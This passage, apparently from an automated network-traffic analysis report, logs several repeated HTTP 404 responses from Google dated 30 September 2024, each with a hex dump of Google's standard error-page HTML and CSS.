65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
